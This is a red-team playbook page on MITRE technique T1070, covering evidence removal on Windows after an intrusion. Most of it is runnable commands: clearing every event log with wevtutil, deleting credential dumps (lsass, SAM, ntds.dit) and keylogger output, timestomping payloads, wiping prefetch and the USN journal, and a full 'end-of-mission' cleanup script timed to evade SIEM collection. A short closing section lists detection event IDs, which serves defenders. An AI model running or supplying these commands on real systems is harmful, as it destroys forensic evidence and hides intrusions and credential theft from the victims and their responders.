T1070: Indicator Removal
Covers: T1070.001 - Clear Windows Event Logs, T1070.004 - File Deletion, T1070.006 - Timestomp
Technique Requirementsβ
| Privileges Required | Administrator (event log clearing, prefetch deletion) / User (file deletion, timestomping own files) |
| Effective Permissions | Context of the invoking user |
| Employment Complexity | 1/5 - Very Low |
| Detection Complexity | 2/5 - Low (clearing a log generates a log entry confirming the clear β the absence of events is itself an indicator) |
Backgroundβ
Indicator removal reduces the forensic evidence left by an operation. Every technique in this document leaves traces: event log entries, files in temp directories, registry keys, prefetch files, and file system timestamps. Cleaning up at the end of a sortie reduces what defenders can reconstruct.
Critical limitation: You cannot truly erase your tracks. The gaps you create are themselves indicators:
- Clearing the Security event log generates Event ID 1102 (Security log cleared) in the Security log and Event ID 104 in the System log β visible to any SIEM that was collecting before the clear
- Gaps in event log sequence numbers are detectable by forensic tools
- Sysmon
EventID 11(FileCreate) for your payload files may already have been forwarded to a SIEM before you deleted them - Prefetch files may have already been imaged by endpoint software
Operational guidance: Cleanup is most valuable when the SIEM is not in real-time forwarding mode β if logs are collected on a delay or batch-forwarded, clearing them before the collection window closes removes evidence. Against real-time SIEM collection, cleanup primarily helps against local forensic analysis (disk imaging, memory acquisition after the fact) rather than defeating active monitoring.
Run cleanup before terminating your session, not after β some cleanup steps (notably AMSI bypass, service cleanup) require an active elevated session.
Method 1: Event Log Clearing (T1070.001)β
LOL binary used: wevtutil.exe
List all available logs (identify what was written to)β
wevtutil el
# Show log details including record count:
wevtutil gl Security
wevtutil gl System
wevtutil gl "Microsoft-Windows-Sysmon/Operational"
Clear individual logsβ
# The four highest-value logs to clear:
wevtutil cl Security
wevtutil cl System
wevtutil cl Application
wevtutil cl "Microsoft-Windows-Sysmon/Operational"
Clear additional operational logs relevant to LOL techniquesβ
# PowerShell script block logging
wevtutil cl "Microsoft-Windows-PowerShell/Operational"
# WMI activity (T1546.003)
wevtutil cl "Microsoft-Windows-WMI-Activity/Operational"
# BITS transfers (T1197 / T1105)
wevtutil cl "Microsoft-Windows-Bits-Client/Operational"
# Task Scheduler (T1053)
wevtutil cl "Microsoft-Windows-TaskScheduler/Operational"
# Windows Defender events (T1562.001)
wevtutil cl "Microsoft-Windows-Windows Defender/Operational"
Clear all logs at once (comprehensive but very noisy)β
# PowerShell one-liner β clears every log on the system:
wevtutil el | ForEach-Object { wevtutil cl "$_" }
Clearing the Security log generates Event ID 1102 ("The audit log was cleared") in the Security log itself, and Event ID 104 in the System log. These events identify the account that performed the clear. If a SIEM is collecting in real-time, these events will be forwarded before the clear completes. Clear logs as the very last step before terminating the session.
Export before clearing (if you want a copy for your records)β
# Save a copy of the Security log before clearing:
wevtutil epl Security C:\Windows\Temp\security_backup.evtx
Method 2: File Deletion (T1070.004)β
LOL binaries used: cmd.exe, powershell.exe
Delete payload files, staging directories, log files, and any other artifacts created during the operation.
Standard deletionβ
# Delete a single file (force, no prompt):
del /f /q C:\Windows\Temp\payload.exe
# Delete multiple files:
del /f /q C:\Windows\Temp\payload.exe C:\Windows\Temp\lsass.dmp C:\Windows\Temp\sam.hive
# Delete all files in a directory:
del /f /q C:\Windows\Temp\perf\*
# Remove a directory and all contents:
rd /s /q C:\Windows\Temp\perf
PowerShell deletionβ
Remove-Item "C:\Windows\Temp\payload.exe" -Force
Remove-Item "C:\Windows\Temp\perf" -Recurse -Force
Standard cleanup checklistβ
After any operation, delete:
del /f /q C:\Windows\Temp\*.exe
del /f /q C:\Windows\Temp\*.dll
del /f /q C:\Windows\Temp\*.dmp
del /f /q C:\Windows\Temp\*.hive
del /f /q C:\Windows\Temp\*.txt
del /f /q C:\Windows\Temp\*.b64
del /f /q C:\Windows\Temp\*.cab
del /f /q C:\Windows\Temp\*.msi
del /f /q C:\Windows\Temp\*.mof
del /f /q C:\Windows\Temp\*.cs
del /f /q C:\Windows\Temp\*.ps1
Secure deletion noteβ
del and Remove-Item mark the file's MFT record as free but do not overwrite the data clusters. Forensic tools can recover deleted files until those clusters are overwritten by new data. For high-sensitivity operations, overwrite before deleting using cipher:
# Overwrite all deleted files' content in a directory (writes 3 passes over free space):
cipher /w:C:\Windows\Temp
cipher /w is slow on large volumes. Scope it to your specific staging directory rather than C:\. It only overwrites already-deleted file clusters β run it after del, not before.
Method 3: Timestomping (T1070.006)β
LOL binary used: powershell.exe (pure .NET, no external binary)
Timestomping modifies the creation, modification, and access timestamps of files to make them appear older than they are, blending them into the existing file system timeline. This complicates timeline-based forensic analysis.
Get current timestampsβ
$file = "C:\Windows\Temp\payload.exe"
$item = Get-Item $file
$item | Select-Object Name, CreationTime, LastWriteTime, LastAccessTime
Set timestamps to match a reference file (most effective β copy timestamps from a legitimate system file)β
$target = "C:\Windows\Temp\payload.exe"
$reference = "C:\Windows\System32\notepad.exe"
$ref = Get-Item $reference
[System.IO.File]::SetCreationTime($target, $ref.CreationTime)
[System.IO.File]::SetLastWriteTime($target, $ref.LastWriteTime)
[System.IO.File]::SetLastAccessTime($target, $ref.LastAccessTime)
Set timestamps to an arbitrary dateβ
$target = "C:\Windows\Temp\payload.exe"
$fakeDate = [DateTime]"2023-06-15 09:30:00"
[System.IO.File]::SetCreationTime($target, $fakeDate)
[System.IO.File]::SetLastWriteTime($target, $fakeDate)
[System.IO.File]::SetLastAccessTime($target, $fakeDate)
Bulk timestomp a directoryβ
$dir = "C:\Windows\Temp\perf"
$reference = "C:\Windows\System32\notepad.exe"
$ref = Get-Item $reference
Get-ChildItem $dir | ForEach-Object {
[System.IO.File]::SetCreationTime($_.FullName, $ref.CreationTime)
[System.IO.File]::SetLastWriteTime($_.FullName, $ref.LastWriteTime)
[System.IO.File]::SetLastAccessTime($_.FullName, $ref.LastAccessTime)
}
Timestomping modifies the $STANDARD_INFORMATION attribute in the MFT. Forensic tools (Autopsy, Plaso) also examine the $FILE_NAME attribute, which Windows does not expose via the standard API β it can only be modified with direct MFT manipulation. The $FILE_NAME timestamps will still show the true creation time on a forensic image, making timestomping detectable to examiners with raw MFT access. Against live-system timeline analysis (dir, Explorer, standard forensics), timestomping is effective.
Method 4: Prefetch Deletionβ
LOL binary used: cmd.exe
Requires: Administrator
Windows Prefetch records every executable that has run β including payload.exe, regsvr32.exe invocations, mshta.exe with unusual arguments, and lsass.exe dumps β in C:\Windows\Prefetch\. Each .pf file records the time the executable last ran and what files it accessed.
# List prefetch files (see what's been recorded):
dir C:\Windows\Prefetch\*.pf
# Delete prefetch for a specific binary:
del /f /q "C:\Windows\Prefetch\PAYLOAD.EXE-*.pf"
# Delete all prefetch files:
del /f /q C:\Windows\Prefetch\*.pf
Deleting all prefetch files is detectable β an empty Prefetch directory on a system that has been running for months is anomalous. Prefer targeted deletion of specific binaries you ran rather than wiping the entire directory.
Method 5: USN Journal Deletionβ
LOL binary used: fsutil.exe
Requires: Administrator
The USN (Update Sequence Number) Journal records all file system changes β file creation, deletion, rename, attribute modification β on NTFS volumes. Forensic tools use the USN Journal to reconstruct file activity even after files are deleted.
# Delete the USN journal on C:
fsutil usn deletejournal /d C:
Deleting the USN Journal is an extreme action. Windows recreates it automatically, but the gap in the journal is detectable by forensic tools. Only use this on high-sensitivity operations where the forensic investigation risk justifies it.
End-of-Mission Cleanup Checklistβ
Run these steps in order at the end of every session before disconnecting:
REM 1. Remove persistence mechanisms (if placed)
REM - Delete Run key values, scheduled tasks, services β see cleanup steps in each technique file
REM 2. Remove payload and staging files
del /f /q C:\Windows\Temp\*.exe
del /f /q C:\Windows\Temp\*.dll
del /f /q C:\Windows\Temp\*.dmp
del /f /q C:\Windows\Temp\*.hive
REM 3. Remove credential dump files
del /f /q C:\Windows\Temp\lsass.dmp
del /f /q C:\Windows\Temp\sam.hive
del /f /q C:\Windows\Temp\system.hive
del /f /q C:\Windows\Temp\security.hive
del /f /q C:\Windows\Temp\ntds.dit
REM 4. Remove keylogger output
del /f /q C:\Windows\Temp\keys.txt
del /f /q C:\Windows\Temp\clip.txt
REM 5. Remove any script/source files
del /f /q C:\Windows\Temp\*.cs
del /f /q C:\Windows\Temp\*.ps1
del /f /q C:\Windows\Temp\*.vbs
del /f /q C:\Windows\Temp\*.js
del /f /q C:\Windows\Temp\*.mof
REM 6. Overwrite free space in staging dir
cipher /w:C:\Windows\Temp
REM 7. Clear targeted prefetch entries
del /f /q "C:\Windows\Prefetch\PAYLOAD*.pf"
del /f /q "C:\Windows\Prefetch\RUNDLL32*.pf"
del /f /q "C:\Windows\Prefetch\REG*.pf"
REM 8. Restore security tools if disabled
REM powershell Set-MpPreference -DisableRealtimeMonitoring $false
REM 9. Clear event logs (last step β do this immediately before disconnecting)
wevtutil cl Security
wevtutil cl System
wevtutil cl "Microsoft-Windows-Sysmon/Operational"
wevtutil cl "Microsoft-Windows-PowerShell/Operational"
wevtutil cl "Microsoft-Windows-TaskScheduler/Operational"
wevtutil cl "Microsoft-Windows-Bits-Client/Operational"
wevtutil cl "Microsoft-Windows-WMI-Activity/Operational"
Log Detectionβ
- Source:
Security- EventID:
1102β Security log was cleared β contains the account name that cleared it
- EventID:
- Source:
System- EventID:
104β System log was cleared
- EventID:
- Source:
Microsoft-Windows-Sysmon/Operational- EventID:
1(ProcessCreate)wevtutil.exewithclargumentcipher.exewith/w:argumentfsutil.exewithusn deletejournal
- EventID:
11(FileCreate) / FileDelete- Mass deletion of
.exe,.dmp,.hivefiles from temp directories
- Mass deletion of
- EventID:
- Source:
Security- EventID:
4688(Process creation with command line auditing)- Same patterns as Sysmon EventID 1
- EventID:
- Absence of events: A gap in the Security log sequence numbers, or a log with only Event ID 1102 and nothing before it, is a reliable indicator that the log was cleared mid-operation.